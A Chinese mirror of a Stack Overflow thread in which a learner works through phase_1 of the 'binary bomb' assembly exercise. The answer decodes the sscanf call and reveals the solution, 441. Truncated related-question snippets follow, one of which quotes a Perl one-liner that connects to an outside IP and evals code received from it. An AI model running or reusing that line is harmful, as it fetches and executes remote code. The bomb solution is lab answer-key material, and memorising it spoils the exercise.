个人中心
文章发布
退出
作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
26
4
我对汇编比较陌生,正在尝试理解以下汇编程序转储(这是从常见的“二进制炸弹”练习中获得的,为了更熟悉汇编,我正在尝试该练习)。基本前提是,您必须通过检查程序集和设置断点,找到成功退出程序所需的正确输入,而无需“触发炸弹”(调用explode_bomb 函数)。这是用于教授 GDB 调试和汇编语法的常见练习。
据我所知,该程序首先使用 scanf 检查字符串输入并检查是否提供了 1 个参数。在设置断点并检查 eax 寄存器的值后,我能够看到我输入的输入值,所以似乎我应该寻找它与其他东西进行比较。然后程序移动一些东西并将 eax 寄存器的值与二进制值 0x52b = 1323 进行比较。但是,我尝试使用这个值作为我的输入,但它不起作用,所以我想知道我是否误解了背后的逻辑这个程序。
我将不胜感激任何帮助/建议!
更新(我不确定这是否正确):
mov 0x1c(%esp),%eax基本上是 eax = [esp + 0x1c] (这不会覆盖程序的输入吗?)lea (%eax,%eax,2),%eax基本上是 eax = eax + eax * 2 cmp $0x52b,%eax比较 eax 中的值注册到 0x52b . 0x08048bd0 <+0>: sub $0x2c,%esp
0x08048bd3 <+3>: movl $0x0,0x1c(%esp)
0x08048bdb <+11>: lea 0x1c(%esp),%eax
0x08048bdf <+15>: mov %eax,0x8(%esp)
0x08048be3 <+19>: movl $0x804a644,0x4(%esp)
0x08048beb <+27>: mov 0x30(%esp),%eax
0x08048bef <+31>: mov %eax,(%esp)
0x08048bf2 <+34>: call 0x8048870 <__isoc99_sscanf@plt>
0x08048bf7 <+39>: cmp $0x1,%eax
0x08048bfa <+42>: je 0x8048c01 <phase_1+49>
0x08048bfc <+44>: call 0x8049363 <explode_bomb>
0x08048c01 <+49>: mov 0x1c(%esp),%eax
0x08048c05 <+53>: lea (%eax,%eax,2),%eax
0x08048c08 <+56>: cmp $0x52b,%eax
0x08048c0d <+61>: je 0x8048c14 <phase_1+68>
0x08048c0f <+63>: call 0x8049363 <explode_bomb>
0x08048c14 <+68>: add $0x2c,%esp
0x08048c17 <+71>: ret
最佳答案
在 x86 32 位中,参数根据 IA32 cdecl 调用约定在堆栈上传递(更多信息见 this wiki page)。
您的 phase_1函数正在调用 sscanf() ,在这里传递参数:
0x08048bdb <+11>: lea 0x1c(%esp),%eax
0x08048bdf <+15>: mov %eax,0x8(%esp)
0x08048be3 <+19>: movl $0x804a644,0x4(%esp)
0x08048beb <+27>: mov 0x30(%esp),%eax
0x08048bef <+31>: mov %eax,(%esp)
sscanf(esp + 0x30, 0x804a644, esp + 0x1c);
int var_on_stack;
sscanf(user_input, "%d", &var_on_stack);
// user_input starts at esp + 0x30
// &var_on_stack == esp + 0x1c
user_input )可能作为参数传递给
phase_1函数,它可能包含先前读取的数据。
0x804a644是传递给
scanf() 的格式字符串的地址,我认为它类似于
"%d"因为之后该值被视为整数。您可以查看地址
0x804a644 的内容与
x/s 0x804a644以准确查看格式字符串是什么(并了解正在读取的变量的类型)。
0x08048c01 <+49>: mov 0x1c(%esp),%eax
0x08048c05 <+53>: lea (%eax,%eax,2),%eax
eax ,然后乘以
3 (即
lea 最终会做
eax = eax*2 + eax )。
0x52b 进行比较。 .因此您需要输入
0x52b/3 , 即
1323/3 , 即
441 .
关于c - 无法理解汇编逻辑,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/61065039/
26
4
0
我试图理解 (>>=).(>>=) ,GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
关于此 Java 代码,我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
对于这个社区来说,这可能是一个愚蠢的基本问题,但如果有人能向我解释一下,我会非常满意,我对此感到非常困惑。我在网上找到了这个教程,这是一个例子。 function sports (x){
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
我有一些排序算法的集合,我想弄清楚它究竟是如何运作的。 我对一些说明有些困惑,特别是 cmp 和 jle 说明,所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
阅读 PHP.net 文档时,我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心,至少有点担心!)。我仍然对那个特定问题的答案感兴
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库,但
我有以下代码,它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么?似乎只使用了“
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程,并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
我遇到了andThen ,但没有正确理解它。 为了进一步了解它,我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
这是一个代码,用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ? scala> val a = List(1,2,3) a: List[Int] = L
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果? 到目前为止,我
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗? data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose
我是一名优秀的程序员,十分优秀!